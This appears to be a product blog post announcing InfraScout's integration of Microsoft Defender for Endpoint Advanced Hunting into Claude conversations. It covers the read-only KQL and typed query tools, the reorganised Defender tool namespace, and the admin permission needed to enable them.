Defender Advanced Hunting, Now in Chat

May 4, 2026 · InfraScout Team

Microsoft Defender for Endpoint holds a rich, continuously updated picture of what is happening on your devices — every process launch, every network connection, every alert and the entities behind it. Until now, getting at that data meant pivoting into the Defender portal and writing KQL by hand. With this update, you can ask Claude directly: "show me devices with high-severity unresolved alerts in the last 24 hours," or "find machines that ran a suspicious PowerShell command this week" — and get structured results back inside the same assessment conversation.

This release also reorganizes Defender into its own toolset, so AI clients pick the right tool deterministically and audit logs group Defender activity sensibly alongside the rest of your Microsoft cloud reviews.

Advanced Hunting from the conversation

Advanced Hunting is the KQL-over-Defender query surface security teams already know. InfraScout exposes it through three new tools that Claude can call during an assessment:

  • Device process events — a typed shape over the most common security pivot. Filter by device, command-line patterns, parent process, and time window to spot living-off-the-land binaries, suspicious script execution, or unusual process lineage.
  • Alert evidence — answer "what entities are linked to this alert?" Pull the files, processes, IPs, and accounts behind a Defender alert without leaving the chat.
  • Generic KQL — a passthrough for ad-hoc queries when you need joins, summarize, or tables the typed tools do not yet wrap. Bring your own KQL; InfraScout returns the rows.

Results come back in a consistent envelope with column metadata, row data, total row count, and a truncated flag so Claude knows when there is more to retrieve. Responses are capped at a reasonable size to keep conversations responsive — when a query would return more, Claude can narrow the time range or add filters and try again.

When Defender's API pushes back with a rate limit, InfraScout surfaces a clear retry hint to the AI client (for example, "Retry after 30 seconds") rather than a cryptic error. Claude then waits and retries on its own, which keeps long investigations flowing without manual intervention.

A dedicated Defender toolset

Defender now lives in its own namespace, separate from the broader security tools. The full Microsoft cloud toolset is now grouped by intent:

  • Identity — Entra ID users, groups, and sign-in posture
  • Platform — Azure subscriptions and resources
  • Security — cross-cloud security signals
  • Service — Microsoft 365 workloads
  • Defender — Defender for Endpoint, including Advanced Hunting

This grouping is visible in the InfraScout dashboard: each MCP tool call is tagged with a category badge, so when you scroll the audit log after an assessment you can see at a glance which calls touched Defender, which queried identity, and which hit Azure. For AI clients, the dedicated namespace also makes tool selection more deterministic — Claude picks defender tools for Defender questions instead of guessing at a generic security tool.

The existing Defender machine tools (machine list, recommendations, logon users) move into this same namespace alongside the new hunting tools. If you have playbooks or notes that referenced the older tool names, update them to the new Defender-prefixed names.

Pairs with playbooks

Advanced Hunting is most useful in context. A Defender-readiness assessment can now blend a hunting query into the rest of the playbook flow — for example, walking through onboarding coverage, then pivoting into a process-events query for a specific high-value device, then continuing with the playbook's recommendations. The same conversation captures the query, the result, and the finding, all linked to the run.

The typed tools accept only the filters they're built for, so Claude cannot wander outside the intended query shape. The generic KQL tool is read-only by design — it can search, summarize, and join, but it cannot change anything in your tenant.

One-time admin step

To enable Advanced Hunting in your tenant, an administrator grants the AdvancedHunting.Read.All application permission on the Microsoft Threat Protection API to the Entra app registration InfraScout uses. This is separate from the permission used by the existing Defender machine tools, so you can adopt hunting at your own pace. Once the consent is in place, the new tools are available to every assessment in the tenant.

The existing Defender machine tools continue to work with their current permission. No change is required to keep using them.

Try it

Open an assessment with Claude and ask a hunting question — "any devices that loaded an unsigned DLL in the last hour?" or "show me alert evidence for alert ID X." Claude picks the right Defender tool, runs the query against your tenant, and returns rows you can act on.

If you want background on the design and the slices still to come (Email and Identity tables, machine actions, Threat Intelligence), the public PRs are a good read: #218 Advanced Hunting tools and #216 Defender toolset split, tracked under issue #215.

Questions or feedback? Reach us at info@infrascout.cloud.